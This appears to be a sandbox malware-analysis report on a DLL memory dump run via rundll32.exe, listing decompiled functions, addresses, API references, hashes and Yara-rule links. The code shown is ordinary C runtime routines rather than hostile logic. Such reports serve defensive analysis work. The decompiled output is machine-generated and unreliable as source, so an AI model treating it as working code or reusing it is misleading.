				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6f37e350 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6f348ce8 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6F33FE77(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6F33FE77(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x6f34026b
0x6f340315
0x6f340273
0x6f340275
0x6f34027c
0x6f34027e
0x6f340284
0x6f340291
0x6f3402a6
0x6f3402aa
0x6f3402fc
0x6f3402fc
0x6f340301
0x6f340305
0x6f340308
0x6f340308
0x6f34030e
0x6f340310
0x6f340327
0x6f340320
0x6f340326
0x6f340326
0x6f340312
0x6f340312
0x00000000
0x6f340312
0x6f3402ac
0x6f3402b5
0x6f3402ec
0x6f3402ec
0x6f3402ee
0x6f3402f0
0x00000000
0x00000000
0x6f3402f8
0x00000000
0x6f3402f8
0x6f3402bf
0x6f3402c4
0x6f3402c9
0x00000000
0x00000000
0x6f3402d3
0x6f3402d8
0x6f3402dd
0x00000000
0x00000000
0x6f3402e2
0x6f3402e8
0x00000000
0x6f3402e8
0x6f340289
0x00000000
0x00000000
0x00000000
0x6f34028f
0x6f34031e
0x00000000

Strings

api-ms-, xrefs: 6F3402B9
ext-ms-, xrefs: 6F3402CD

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 19ab0106cd6379729c42989a4e308868e20c531b42942a649bc906f70f02ae33
Instruction ID: 974693204dd7d5f4a2bf7ae27c1e1c9dabaf08ee42c219798bdccc305c5b0051
Opcode Fuzzy Hash: 19ab0106cd6379729c42989a4e308868e20c531b42942a649bc906f70f02ae33
Instruction Fuzzy Hash: 25212BB1B45624BBDB119A348D40A4E3FEC9F66770F211215EC55AB2C1DB32ED04C5E0

Uniqueness

Uniqueness Score: -1.00%

Function 6F3447A7, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F3447A7(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6F34476F(_t45, 7);
					E6F34476F(_t45 + 0x1c, 7);
					E6F34476F(_t45 + 0x38, 0xc);
					E6F34476F(_t45 + 0x68, 0xc);
					E6F34476F(_t45 + 0x98, 2);
					E6F33FEFF( *((intOrPtr*)(_t45 + 0xa0)));
					E6F33FEFF( *((intOrPtr*)(_t45 + 0xa4)));
					E6F33FEFF( *((intOrPtr*)(_t45 + 0xa8)));
					E6F34476F(_t45 + 0xb4, 7);
					E6F34476F(_t45 + 0xd0, 7);
					E6F34476F(_t45 + 0xec, 0xc);
					E6F34476F(_t45 + 0x11c, 0xc);
					E6F34476F(_t45 + 0x14c, 2);
					E6F33FEFF( *((intOrPtr*)(_t45 + 0x154)));
					E6F33FEFF( *((intOrPtr*)(_t45 + 0x158)));
					E6F33FEFF( *((intOrPtr*)(_t45 + 0x15c)));
					return E6F33FEFF( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6f3447ad
0x6f3447b2
0x6f3447bb
0x6f3447c6
0x6f3447d1
0x6f3447dc
0x6f3447ea
0x6f3447f5
0x6f344800
0x6f34480b
0x6f344819
0x6f344827
0x6f344838
0x6f344846
0x6f344854
0x6f34485f
0x6f34486a
0x6f344875
0x00000000
0x6f344885
0x6f34488a

APIs

Part of subcall function 6F34476F: _free.LIBCMT ref: 6F344794

_free.LIBCMT ref: 6F3447F5

Part of subcall function 6F33FEFF: HeapFree.KERNEL32(00000000,00000000,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?), ref: 6F33FF15
Part of subcall function 6F33FEFF: GetLastError.KERNEL32(?,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?,?), ref: 6F33FF27

_free.LIBCMT ref: 6F344800
_free.LIBCMT ref: 6F34480B
_free.LIBCMT ref: 6F34485F
_free.LIBCMT ref: 6F34486A
_free.LIBCMT ref: 6F344875
_free.LIBCMT ref: 6F344880

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ef2c806dc7946e275d41aea7e72c5aba1546200829dff6b1409bfec46ce686fb
Instruction ID: dcac1134fe65fe879e8bcca06ee93b64a2c8ef964bbb42740c435b160a1537b9
Opcode Fuzzy Hash: ef2c806dc7946e275d41aea7e72c5aba1546200829dff6b1409bfec46ce686fb
Instruction Fuzzy Hash: 40118E32940B84EBD620EBB0CD05FCF7BDDAF81754F800A25B6E9A61E1EB35B5058650

Uniqueness

Uniqueness Score: -1.00%

Function 6F34312B, Relevance: 9.3, APIs: 6, Instructions: 319
fileCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E6F34312B(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				long _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				long _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				long _t235;
				struct _OVERLAPPED* _t243;
				signed int _t246;
				intOrPtr _t249;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				struct _OVERLAPPED* _t256;
				intOrPtr _t258;
				void* _t262;
				long _t263;
				signed char _t264;
				signed int _t265;
				void* _t266;
				void* _t268;
				struct _OVERLAPPED* _t269;
				long _t270;
				signed int _t271;
				long _t275;
				signed int _t278;
				long _t279;
				struct _OVERLAPPED* _t280;
				signed int _t282;
				intOrPtr _t284;
				signed int _t286;
				signed int _t289;
				long _t290;
				long _t291;
				signed int _t292;
				intOrPtr _t293;
				signed int _t294;
				void* _t295;
				void* _t296;

				_t172 =  *0x6f36609c; // 0xe80c9ffe
				_v8 = _t172 ^ _t294;
				_t174 = _a8;
				_t263 = _a12;
				_t282 = (_t174 & 0x0000003f) * 0x38;
				_t246 = _t174 >> 6;
				_v112 = _t263;
				_v84 = _t246;
				_v80 = _t282;
				_t284 = _a16 + _t263;
				_v116 =  *((intOrPtr*)(_t282 +  *((intOrPtr*)(0x6f37e428 + _t246 * 4)) + 0x18));
				_v104 = _t284;
				_t178 = GetConsoleCP();
				_t243 = 0;
				_v124 = _t178;
				E6F33EA98( &_v72, _t263, 0);
				asm("stosd");
				_t249 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t249;
				asm("stosd");
				asm("stosd");
				_t275 = _v112;
				_v40 = _t275;
				if(_t275 >= _t284) {
					L52:
					__eflags = _v60 - _t243;
				} else {
					_t286 = _v92;
					while(1) {
						_v47 =  *_t275;
						_v76 = _t243;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x6f37e428 + _v84 * 4));
						_v52 = _t186;
						if(_t249 != 0xfde9) {
							goto L23;
						}
						_t265 = _v80;
						_t212 = _t186 + 0x2e + _t265;
						_t256 = _t243;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t256)) != _t243) {
							_t256 =  &(_t256->Internal);
							if(_t256 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t278 = _v104 - _t213;
						_v44 = _t256;
						if(_t256 <= 0) {
							_t258 =  *((char*)(( *_t213 & 0x000000ff) + 0x6f3667f0)) + 1;
							_v52 = _t258;
							__eflags = _t258 - _t278;
							if(_t258 > _t278) {
								__eflags = _t278;
								if(_t278 <= 0) {
									goto L44;
								} else {
									_t290 = _v40;
									do {
										_t266 = _t265 + _t243;
										_t216 =  *((intOrPtr*)(_t243 + _t290));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t266 +  *((intOrPtr*)(0x6f37e428 + _v84 * 4)) + 0x2e)) = _t216;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									goto L43;
								}
							} else {
								_t279 = _v40;
								__eflags = _t258 - 4;
								_v144 = _t243;
								_t260 =  &_v144;
								_v140 = _t243;
								_v56 = _t279;
								_t219 = (0 | _t258 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t265 + _v52 + 0x2e) & 0x000000ff) + 0x6f3667f0)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t256;
							_v52 = _t229;
							if(_t229 > _t278) {
								__eflags = _t278;
								if(_t278 > 0) {
									_t291 = _v40;
									do {
										_t268 = _t265 + _t243 + _t256;
										_t231 =  *((intOrPtr*)(_t243 + _t291));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t268 +  *((intOrPtr*)(0x6f37e428 + _v84 * 4)) + 0x2e)) = _t231;
										_t256 = _v44;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									L43:
									_t286 = _v92;
								}
								L44:
								_t289 = _t286 + _t278;
								__eflags = _t289;
								L45:
								__eflags = _v60;
								_v92 = _t289;
							} else {
								_t269 = _t243;
								if(_t256 > 0) {
									_t293 = _v108;
									do {
										 *((char*)(_t294 + _t269 - 0xc)) =  *((intOrPtr*)(_t293 + _t269));
										_t269 =  &(_t269->Internal);
									} while (_t269 < _t256);
									_t229 = _v52;
								}
								_t279 = _v40;
								if(_t229 > 0) {
									E6F33DD40( &_v16 + _t256, _t279, _v52);
									_t256 = _v44;
									_t295 = _t295 + 0xc;
								}
								if(_t256 > 0) {
									_t270 = _v44;
									_t280 = _t243;
									_t292 = _v80;
									do {
										_t262 = _t292 + _t280;
										_t280 =  &(_t280->Internal);
										 *(_t262 +  *((intOrPtr*)(0x6f37e428 + _v84 * 4)) + 0x2e) = _t243;
									} while (_t280 < _t270);
									_t279 = _v40;
								}
								_v136 = _t243;
								_v120 =  &_v16;
								_t260 =  &_v136;
								_v132 = _t243;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E6F344104(_t260);
								_t296 = _t295 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t275 = _t279 + _v52 - 1;
									L31:
									_t275 = _t275 + 1;
									_v40 = _t275;
									_t193 = E6F3427A9(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
									_t295 = _t296 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t286 = _v88 - _v112 + _t275;
											_v92 = _t286;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t275 >= _v104) {
														goto L52;
													} else {
														_t249 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t286 = _t286 + 1;
															_v92 = _t286;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t252 = _v80;
						_t264 =  *((intOrPtr*)(_t252 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t275;
							_t188 = E6F342E16(_t264);
							_t253 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t253 * 2)) - _t243;
							if( *((intOrPtr*)(_t188 + _t253 * 2)) >= _t243) {
								_push(1);
								_push(_t275);
								goto L30;
							} else {
								_t202 = _t275 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t271 = _v84;
									_t255 = _v80;
									 *((char*)(_t255 +  *((intOrPtr*)(0x6f37e428 + _t271 * 4)) + 0x2e)) = _v33;
									 *(_t255 +  *((intOrPtr*)(0x6f37e428 + _t271 * 4)) + 0x2d) =  *(_t255 +  *((intOrPtr*)(0x6f37e428 + _t271 * 4)) + 0x2d) | 0x00000004;
									_t289 = _t286 + 1;
									goto L45;
								} else {
									_t206 = E6F340CDA( &_v76, _t275, 2);
									_t296 = _t295 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t275 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t252 + _t186 + 0x2e));
							_v23 =  *_t275;
							_push(2);
							 *(_t252 + _v52 + 0x2d) = _t264 & 0x000000fb;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E6F340CDA();
							_t296 = _t295 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t294;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6F33C65E(_v8 ^ _t294);
			}

0x6f343136
0x6f34313d
0x6f343140
0x6f343145
0x6f34314d
0x6f343150
0x6f343154
0x6f343157
0x6f343161
0x6f34316b
0x6f34316d
0x6f343170
0x6f343173
0x6f343179
0x6f34317b
0x6f343182
0x6f34318f
0x6f343190
0x6f343193
0x6f343196
0x6f343197
0x6f343198
0x6f34319b
0x6f3431a0
0x6f3434ac
0x6f3434ac
0x6f3431a6
0x6f3431a6
0x6f3431a9
0x6f3431ab
0x6f3431b1
0x6f3431b4
0x6f3431bb
0x6f3431c2
0x6f3431cb
0x00000000
0x00000000
0x6f3431d1
0x6f3431d7
0x6f3431d9
0x6f3431db
0x6f3431de
0x6f3431e3
0x6f3431e7
0x00000000
0x00000000
0x00000000
0x6f3431e7
0x6f3431ec
0x6f3431ef
0x6f3431f1
0x6f3431f6
0x6f3432a8
0x6f3432a9
0x6f3432ac
0x6f3432ae
0x6f34345c
0x6f34345e
0x00000000
0x6f343460
0x6f343460
0x6f343463
0x6f343466
0x6f34346f
0x6f343472
0x6f343473
0x6f343477
0x6f34347a
0x6f34347a
0x00000000
0x6f34347e
0x6f3432b4
0x6f3432b4
0x6f3432b9
0x6f3432bc
0x6f3432c2
0x6f3432c8
0x6f3432d1
0x6f3432d4
0x6f3432d4
0x6f3432d5
0x6f3432d6
0x6f3432d9
0x6f3432da
0x00000000
0x6f3432da
0x6f3431fc
0x6f34320b
0x6f34320c
0x6f34320f
0x6f343211
0x6f343216
0x6f343427
0x6f343429
0x6f34342b
0x6f34342e
0x6f343433
0x6f34343c
0x6f34343f
0x6f343440
0x6f343444
0x6f343447
0x6f34344a
0x6f34344a
0x6f34344e
0x6f34344e
0x6f34344e
0x6f343451
0x6f343451
0x6f343451
0x6f343453
0x6f343453
0x6f343457
0x6f34321c
0x6f34321c
0x6f343220
0x6f343222
0x6f343225
0x6f343228
0x6f34322c
0x6f34322d
0x6f343231
0x6f343231
0x6f343234
0x6f343239
0x6f343245
0x6f34324a
0x6f34324d
0x6f34324d
0x6f343252
0x6f343254
0x6f343257
0x6f343259
0x6f34325c
0x6f34325f
0x6f343262
0x6f34326a
0x6f34326e
0x6f343272
0x6f343272
0x6f343278
0x6f34327e
0x6f343281
0x6f343289
0x6f343290
0x6f343294
0x6f343295
0x6f343298
0x6f343299
0x6f3432dd
0x6f3432dd
0x6f3432e1
0x6f3432e2
0x6f3432e7
0x6f3432ed
0x00000000
0x6f3432f3
0x6f3432f7
0x6f343380
0x6f343387
0x6f34338f
0x6f343397
0x6f34339c
0x6f34339f
0x6f3433a4
0x00000000
0x6f3433aa
0x6f3433bf
0x6f3434a3
0x6f3434a9
0x00000000
0x6f3433c5
0x6f3433ce
0x6f3433d0
0x6f3433d6
0x00000000
0x6f3433dc
0x6f3433e0
0x6f343416
0x6f343419
0x00000000
0x6f34341f
0x6f34341f
0x00000000
0x6f34341f
0x6f3433e2
0x6f3433e4
0x6f3433e6
0x6f3433ff
0x00000000
0x6f343405
0x6f343409
0x00000000
0x6f34340f
0x6f34340f
0x6f343412
0x6f343413
0x00000000
0x6f343413
0x6f343409
0x6f3433ff
0x6f3433e0
0x6f3433d6
0x6f3433bf
0x6f3433a4
0x6f3432ed
0x6f343216
0x00000000
0x6f3432fe
0x6f3432fe
0x6f343301
0x6f343305
0x6f343308
0x6f34332a
0x6f34332d
0x6f343332
0x6f343336
0x6f34333a
0x6f343368
0x6f34336a
0x00000000
0x6f34333c
0x6f34333c
0x6f34333f
0x6f343342
0x6f343345
0x6f343480
0x6f343483
0x6f343490
0x6f34349b
0x6f3434a0
0x00000000
0x6f34334b
0x6f343352
0x6f343357
0x6f34335a
0x6f34335d
0x00000000
0x6f343363
0x6f343363
0x00000000
0x6f343363
0x6f34335d
0x6f343345
0x6f34330a
0x6f343311
0x6f343316
0x6f34331c
0x6f34331e
0x6f343325
0x6f34336b
0x6f34336e
0x6f34336f
0x6f343374
0x6f343377
0x6f34337a
0x00000000
0x00000000
0x00000000
0x00000000
0x6f34337a
0x00000000
0x6f343308
0x6f3431a9
0x6f3434af
0x6f3434af
0x6f3434b1
0x6f3434b4
0x6f3434b4
0x6f3434b4
0x6f3434b4
0x6f3434c6
0x6f3434c8
0x6f3434c9
0x6f3434ca
0x6f3434d6

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6F343173
__fassign.LIBCMT ref: 6F343352
__fassign.LIBCMT ref: 6F34336F
WriteFile.KERNEL32(?,6F3407E3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6F3433B7
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F3433F7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6F3434A3

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: b5f0fe09be84fdecc32608b0b7aae92354bb408cccc0c528f466c9f83e70e0d9
Instruction ID: ff8971410956237dcd83287d6418eaf3a5583b91c5fd18bd8da8759ae2372e63
Opcode Fuzzy Hash: b5f0fe09be84fdecc32608b0b7aae92354bb408cccc0c528f466c9f83e70e0d9
Instruction Fuzzy Hash: 4FD18775D002589FDB11CFA8C8819EDBBF9EF49324F24016AE855FB341D631AA46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F33D7C6, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6F33D7C6(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x6f3660c0 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E6F33DAD7(__eflags,  *0x6f3660c0);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6F33DB12(__eflags,  *0x6f3660c0, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t28 = E6F33FE6C(_t16);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6F33DB12(__eflags,  *0x6f3660c0, 0);
								} else {
									__eflags = E6F33DB12(__eflags,  *0x6f3660c0, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6F33E93F(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

0x6f33d7cd
0x6f33d7e0
0x6f33d7e7
0x6f33d7ea
0x6f33d7ed
0x6f33d806
0x6f33d806
0x6f33d7ef
0x6f33d7ef
0x6f33d7f1
0x6f33d7fb
0x6f33d801
0x6f33d802
0x6f33d804
0x6f33d80b
0x6f33d80d
0x6f33d814
0x6f33d818
0x6f33d81a
0x6f33d82e
0x6f33d82e
0x6f33d837
0x6f33d81c
0x6f33d82a
0x6f33d82c
0x6f33d840
0x6f33d842
0x6f33d842
0x00000000
0x00000000
0x00000000
0x6f33d82c
0x6f33d845
0x00000000
0x00000000
0x00000000
0x6f33d804
0x6f33d7f1
0x6f33d84d
0x6f33d857
0x6f33d7cf
0x6f33d7d1
0x6f33d7d1

APIs

GetLastError.KERNEL32(00000001,?,6F33D578,6F33CC5A,6F33C7BB,?,6F33C9D8,?,00000001,?,?,00000001,?,6F364F78,0000000C,6F33CACC), ref: 6F33D7D4
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F33D7E2
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F33D7FB
SetLastError.KERNEL32(00000000,6F33C9D8,?,00000001,?,?,00000001,?,6F364F78,0000000C,6F33CACC,?,00000001,?), ref: 6F33D84D

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 039f866e863e81a30d58f472338b48dbefec1c9cb0f4211ea911d44d10d4484d
Instruction ID: d9ed62cd684d1e2314433bc42ea4a6bc2be30e1454e0545abc3bd87ab5126c31
Opcode Fuzzy Hash: 039f866e863e81a30d58f472338b48dbefec1c9cb0f4211ea911d44d10d4484d
Instruction Fuzzy Hash: B201FC33A0DBB96E970499786C45A572B6EEF437B9720033EF5514E1D0EF2368549290

Uniqueness

Uniqueness Score: -1.00%

Function 6F341D1D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F341D1D(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E6F3427A9(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E6F3427A9(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E6F34016E(GetLastError());
									_t17 =  *((intOrPtr*)(E6F3401A4(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E6F341DE4(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6F34016E(GetLastError());
						_t17 =  *((intOrPtr*)(E6F3401A4(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E6F341DE4(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6F341E0B(_a8);
				return 0;
			}

0x6f341d23
0x6f341d28
0x6f341d3c
0x6f341d3f
0x6f341d71
0x6f341d79
0x6f341d7b
0x6f341d94
0x6f341d97
0x6f341d9a
0x6f341da8
0x6f341db7
0x6f341dbf
0x6f341dc1
0x6f341dda
0x6f341ddd
0x6f341ddd
0x6f341dc3
0x6f341dca
0x6f341dd5
0x6f341dd5
0x6f341ddf
0x6f341de0
0x00000000
0x6f341de0
0x6f341d9f
0x6f341da4
0x6f341da6
0x00000000
0x00000000
0x00000000
0x6f341da6
0x6f341d84
0x6f341d8f
0x00000000
0x6f341d8f
0x6f341d41
0x6f341d44
0x6f341d47
0x6f341d5a
0x6f341d5d
0x6f341d5f
0x6f341d61
0x00000000
0x6f341d61
0x6f341d4d
0x6f341d52
0x6f341d54
0x00000000
0x00000000
0x00000000
0x6f341d54
0x6f341d2d
0x00000000

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6F341D22

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
